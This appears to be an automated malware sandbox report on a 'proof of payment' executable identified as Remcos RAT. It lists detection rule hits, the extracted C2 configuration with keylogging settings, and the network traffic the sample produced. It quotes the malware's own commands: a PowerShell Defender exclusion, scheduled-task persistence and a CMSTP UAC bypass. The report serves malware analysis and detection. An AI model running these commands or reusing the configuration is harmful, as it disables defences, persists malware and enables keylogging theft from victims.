0.2.proof of paymentt.exe.401a868.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x86008:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x85f9c:$s1: CoGetObject 0x85fb0:$s1: CoGetObject 0x85fcc:$s1: CoGetObject 0x8ff58:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0x85f5c:$s2: Elevation:Administrator!new:
Click to see the 36 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of paymentt.exe", ParentImage: C:\Users\user\Desktop\proof of paymentt.exe, ParentProcessId: 6500, ParentProcessName: proof of paymentt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", ProcessId: 2672, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, ParentImage: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, ParentProcessId: 4304, ParentProcessName: mQpdTSxCjbPop.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp", ProcessId: 2576, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of paymentt.exe", ParentImage: C:\Users\user\Desktop\proof of paymentt.exe, ParentProcessId: 6500, ParentProcessName: proof of paymentt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", ProcessId: 5836, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of paymentt.exe", ParentImage: C:\Users\user\Desktop\proof of paymentt.exe, ParentProcessId: 6500, ParentProcessName: proof of paymentt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe", ProcessId: 2672, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of paymentt.exe", ParentImage: C:\Users\user\Desktop\proof of paymentt.exe, ParentProcessId: 6500, ParentProcessName: proof of paymentt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp", ProcessId: 5836, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\proof of paymentt.exe, ProcessId: 6112, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing

Found malware configuration

Source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: proof of paymentt.exe	Virustotal: Detection: 45%			Perma Link
Source: proof of paymentt.exe	ReversingLabs: Detection: 36%

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: proof of paymentt.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		12_2_00433837
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		16_2_00404423

Source: proof of paymentt.exe, 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2581d796-1

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_004074FD _wcslen,CoGetObject,

12_2_004074FD

Source: proof of paymentt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.126.112.149:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.126.112.149:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49733 version: TLS 1.2

Source: proof of paymentt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409253
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	12_2_0041C291
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	12_2_0040C34D
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409665
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0044E879 FindFirstFileExA,	12_2_0044E879
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	12_2_0040880C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,	12_2_0040783C
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00419AF5
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040BB30
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040BD37
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,	16_2_0040AE51
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	17_2_00407EF8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	19_2_00407898

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00407C97

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 4x nop then jmp 06E1B20Fh		0_2_06E1B51D
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 4x nop then jmp 073BA4BFh		9_2_073BA7CD

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 37.120.235.122

Source: global traffic

TCP traffic: 192.168.2.5:49707 -> 37.120.235.122:2269

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: SECURE-DATA-ASRO SECURE-DATA-ASRO

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49729 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 104.126.112.149
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122
Source: unknown	TCP traffic detected without corresponding DNS query: 37.120.235.122

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

12_2_0041B380

Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGIHZ0rEGIjB_Qkm3crtF5Diayds78MQPvcGWLxph33UahTGVaOvK_O2C395pW0j53DoBQmglIRIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-09; NID=513=kf08ap03Enu5vH37Q9HwnjLUtxfa6l9M-obfy7WtzK2ZMJeTXigT5vVPCPaqgLe-8OzIDVElm82UrleNC9YlYfv7bkgGrz69oUBmTJ3MAv6roDxmYcpgpXDdKlv1QN9yg_UY_Y6aYr6PryPeLIu0zDCI1ApCUnSIaKK2o2tpjLQ
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGIHZ0rEGIjDiV69rK5qM04HlVCP5HIxKT4yFlyXGN87fd-gxnuiXdKGTW6789z2jSG8fGE3fLfIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-03-09; NID=513=LlUHQLr5Y133oMGNzEa_SRif_xUDN8HY8u4HhyWXXk0hbbeVRnqkU6_cYn6XuNP9iSnwoQM46aM2DIhUrR3ksC4ODkTNTP2EulpgsMZFBF7hobj7s2cdGaRL-gaeDymBN1kscScb2mGnBHyhG5GD0ZhuJa8JFCTcQ9CmCCLOoKE
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7nm+GBGyeGaenUO&MD=Fmagl9TN HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7nm+GBGyeGaenUO&MD=Fmagl9TN HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: proof of paymentt.exe, 00000010.00000002.2199340161.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
Source: proof of paymentt.exe, 00000010.00000002.2199340161.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
Source: proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: proof of paymentt.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
